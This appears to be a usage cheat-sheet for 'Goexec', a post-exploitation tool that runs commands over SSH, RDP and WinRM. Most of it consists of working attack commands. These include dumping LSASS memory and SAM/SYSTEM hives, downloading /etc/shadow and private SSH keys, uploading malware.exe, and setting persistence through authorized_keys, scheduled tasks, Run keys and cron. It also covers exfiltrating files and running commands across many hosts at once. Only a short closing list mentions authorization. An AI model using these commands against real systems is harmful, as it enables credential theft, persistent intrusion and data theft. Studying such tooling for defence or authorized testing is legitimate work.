
Goexec

Goexec is a multi-protocol remote command execution framework designed for post-exploitation. It provides unified command execution across SSH, RDP, WinRM, and PSRP, with support for file transfer, interactive shells, and batch operations.

Installation

# Build from Go source
git clone https://github.com/rapid7/goexec
cd goexec
go build -o goexec

# Or download a prebuilt release binary
wget https://github.com/rapid7/goexec/releases/latest/download/goexec-linux-x64
chmod +x goexec-linux-x64

SSH Execution

Basic SSH Commands

# Execute single command
./goexec ssh -u username -p password -h target.com 'whoami'

# With key-based authentication
./goexec ssh -u username -k ~/.ssh/id_rsa -h target.com 'id'

# Custom port
./goexec ssh -u username -p password -h target.com:2222 'uname -a'

# Passphrase-protected key
./goexec ssh -u username -k ~/.ssh/id_rsa --keypass passphrase -h target.com 'ls -la'

# Trust unknown hosts (accept a host key that is not already known)
./goexec ssh -u username -p password -h target.com --trust-unknown-hosts 'hostname'

SSH Options

# Verbose output
./goexec ssh -u username -p password -h target.com --verbose 'whoami'

# Custom timeout
./goexec ssh -u username -p password -h target.com --timeout 30 'long_command'

# SSH version specification
./goexec ssh -u username -p password -h target.com --ssh-version 2 'command'

Interactive SSH Shell

# Start interactive session
./goexec ssh -u username -p password -h target.com shell

# Type commands interactively
whoami
id
pwd
ls -la /etc/passwd
exit

Windows RDP Execution

RDP Command Execution

# Execute command via RDP
./goexec rdp -u domain\\username -p password -h target.com 'whoami'

# Username without a domain prefix
./goexec rdp -u username -p password -h target.com 'Get-Process'

# Custom RDP port
./goexec rdp -u username -p password -h target.com:3389 'ipconfig'

# Get system info
./goexec rdp -u domain\\user -p pass -h target.com 'systeminfo'

Windows WinRM Execution

PowerShell via WinRM

# Execute PowerShell command
./goexec winrm -u username -p password -h target.com 'Get-Process'

# List running services
./goexec winrm -u username -p password -h target.com 'Get-Service | Select Name,Status'

# Get network configuration
./goexec winrm -u username -p password -h target.com 'ipconfig /all'

# Get system information
./goexec winrm -u username -p password -h target.com 'systeminfo'

# Execute batch command
./goexec winrm -u username -p password -h target.com 'cmd /c whoami'

WinRM Configuration

# Standard WinRM port (HTTP)
./goexec winrm -u username -p password -h target.com:5985 'whoami'

# HTTPS WinRM (port 5986)
./goexec winrm -u username -p password -h target.com:5986 --https 'whoami'

# Skip TLS certificate verification (the session can then be intercepted; prefer a trusted certificate)
./goexec winrm -u username -p password -h target.com:5986 --https --insecure 'whoami'

PowerShell Script Execution

# Execute PowerShell script
./goexec winrm -u username -p password -h target.com \
  'powershell.exe -File C:\\scripts\\deploy.ps1'

# Execute inline PowerShell
./goexec winrm -u username -p password -h target.com \
  'powershell.exe -Command "Get-MpComputerStatus"'

# Encoded command (bypass restrictions)
COMMAND='Write-Host "Executing"'
ENCODED=$(echo -n "$COMMAND" | base64 -w 0)
./goexec winrm -u username -p password -h target.com \
  "powershell.exe -EncodedCommand $ENCODED"

# PowerShell remoting
./goexec winrm -u username -p password -h target.com \
  'Invoke-Command -ComputerName server01 -ScriptBlock { Get-Process }'

File Transfer

Upload Files

# Upload via SSH SCP
./goexec ssh -u username -p password -h target.com \
  --upload /local/path/file.txt /remote/path/file.txt

# Upload via RDP
./goexec rdp -u username -p password -h target.com \
  --upload payload.exe C:\\Windows\\Temp\\payload.exe

# Upload via WinRM
./goexec winrm -u username -p password -h target.com \
  --upload malware.exe C:\\temp\\malware.exe

Download Files

# Download via SSH
./goexec ssh -u username -p password -h target.com \
  --download /remote/path/file.txt /local/path/file.txt

# Download sensitive files
./goexec ssh -u username -p password -h target.com \
  --download /etc/shadow ./shadow.txt

# Download via RDP
./goexec rdp -u username -p password -h target.com \
  --download C:\\Users\\username\\Documents\\secret.txt ./secret.txt

# Recursive directory download
./goexec ssh -u username -p password -h target.com \
  --download-dir /remote/directory /local/directory

System Reconnaissance

Linux/Unix Commands

# Basic system info
./goexec ssh -u user -p pass -h target.com 'uname -a'
./goexec ssh -u user -p pass -h target.com 'cat /etc/os-release'

# Network information
./goexec ssh -u user -p pass -h target.com 'ip addr show'
./goexec ssh -u user -p pass -h target.com 'netstat -tulpn'

# User enumeration
./goexec ssh -u user -p pass -h target.com 'cat /etc/passwd'
./goexec ssh -u user -p pass -h target.com 'id'

# Sudo privileges
./goexec ssh -u user -p pass -h target.com 'sudo -l'

# Installed software
./goexec ssh -u user -p pass -h target.com 'dpkg -l'
./goexec ssh -u user -p pass -h target.com 'rpm -qa'

Windows Commands

# System information
./goexec winrm -u user -p pass -h target.com 'systeminfo'
./goexec winrm -u user -p pass -h target.com 'wmic os get caption'

# Network config
./goexec winrm -u user -p pass -h target.com 'ipconfig /all'
./goexec winrm -u user -p pass -h target.com 'netstat -ano'

# User enumeration
./goexec winrm -u user -p pass -h target.com 'net user'
./goexec winrm -u user -p pass -h target.com 'whoami'

# Installed software
./goexec winrm -u user -p pass -h target.com 'wmic product list'
./goexec winrm -u user -p pass -h target.com 'Get-WmiObject -Class Win32_Product'

Credential Harvesting

LSASS Dumping

# Dump LSASS process memory
./goexec winrm -u user -p pass -h target.com \
  'powershell.exe -Command "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump (Get-Process lsass).Id C:\\temp\\lsass.dmp full"'

# Using procdump
./goexec winrm -u user -p pass -h target.com \
  'C:\\tools\\procdump.exe -accepteula -ma lsass.exe C:\\temp\\lsass.dmp'

SAM Database Access

# Save SAM registry hive
./goexec winrm -u user -p pass -h target.com \
  'reg save HKLM\\SAM C:\\temp\\sam.reg'

# Save SYSTEM hive
./goexec winrm -u user -p pass -h target.com \
  'reg save HKLM\\SYSTEM C:\\temp\\system.reg'

# Extract and download
./goexec winrm -u user -p pass -h target.com --download C:\\temp\\sam.reg ./sam.reg

Linux Credential Harvesting

# Bash history
./goexec ssh -u user -p pass -h target.com 'cat ~/.bash_history'

# Auth logs
./goexec ssh -u user -p pass -h target.com 'cat /var/log/auth.log | grep sudo'

# SSH keys
./goexec ssh -u user -p pass -h target.com --download ~/.ssh/id_rsa ./id_rsa

Persistence Mechanisms

SSH Key Persistence

# Add SSH key to authorized_keys
./goexec ssh -u user -p pass -h target.com \
  'echo "ssh-rsa AAAAB3NzaC..." >> ~/.ssh/authorized_keys'

# Create .ssh directory if needed
./goexec ssh -u user -p pass -h target.com \
  'mkdir -p ~/.ssh && echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys'

Windows Scheduled Task

# Create scheduled task
./goexec winrm -u user -p pass -h target.com \
  'schtasks /create /tn "SystemUpdate" /tr "C:\\malware.exe" /sc onstart'

# With SYSTEM privileges
./goexec winrm -u user -p pass -h target.com \
  'schtasks /create /tn "Update" /tr "C:\\malware.exe" /sc hourly /ru SYSTEM'

Windows Registry Persistence

# Run registry entry
./goexec winrm -u user -p pass -h target.com \
  'reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Update /d C:\\malware.exe'

# Startup folder
./goexec winrm -u user -p pass -h target.com \
  'copy C:\\malware.exe "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"'

Linux Cron Persistence

# Add cron job
./goexec ssh -u user -p pass -h target.com \
  'echo "0 */4 * * * /opt/update.sh" | crontab -'

# Systemd timer
./goexec ssh -u user -p pass -h target.com \
  'systemctl --user enable persistence.timer'

Data Exfiltration

File Collection

# Copy sensitive files
./goexec ssh -u user -p pass -h target.com --download /etc/shadow ./shadow.txt
./goexec ssh -u user -p pass -h target.com --download /etc/passwd ./passwd.txt

# Archive and exfiltrate
./goexec ssh -u user -p pass -h target.com 'tar czf - /var/www' > website.tar.gz

# Windows data exfiltration
./goexec winrm -u user -p pass -h target.com \
  'Get-Content C:\\sensitive\\data.txt' > exfil.txt

Batch Operations

Execute on Multiple Hosts

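#!/bin/bash
# Process multiple targets: run one command on every host listed in targets.txt.
#
# targets.txt holds one host per line (a name or address, optionally host:port).
# Blank lines and lines starting with '#' are skipped.  A failure on one host
# does not stop the loop; failures are reported on stderr and the script exits
# non-zero if any host did not complete.
set -u

# Example target list, one entry per line.
cat > targets.txt << 'EOF'
192.168.1.10
192.168.1.11
192.168.1.12
EOF

failed=0
# A while-read loop reads the file line by line without the word-splitting and
# globbing that `for target in $(cat targets.txt)` applies to its output; -r
# keeps backslashes literal, and `|| [[ -n "$target" ]]` still handles a final
# line that lacks a trailing newline.
while read -r target || [[ -n "$target" ]]; do
  # Skip empty lines and comment lines.
  [[ -z "$target" || "$target" == '#'* ]] && continue
  printf '[*] Executing on %s\n' "$target"
  if ! ./goexec ssh -u username -p password -h "$target" 'whoami'; then
    printf '[!] Command failed on %s\n' "$target" >&2
    failed=$((failed + 1))
  fi
done < targets.txt

if (( failed > 0 )); then
  printf '[!] %d host(s) failed\n' "$failed" >&2
  exit 1
fi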

Parallel Execution

# Execute in parallel
cat targets.txt | parallel -j 4 \
  ./goexec ssh -u username -p password -h {} 'id'

# With xargs
cat targets.txt | xargs -P 4 -I {} \
  ./goexec ssh -u username -p password -h {} 'ps aux'

Security Considerations

  • Only use with proper authorization
  • Log all command execution
  • Rotate compromised credentials
  • Monitor for suspicious activity
  • Clean up artifacts
  • Use encrypted channels
  • Implement access controls
  • Document all activities

References


Last updated: 2026-03-30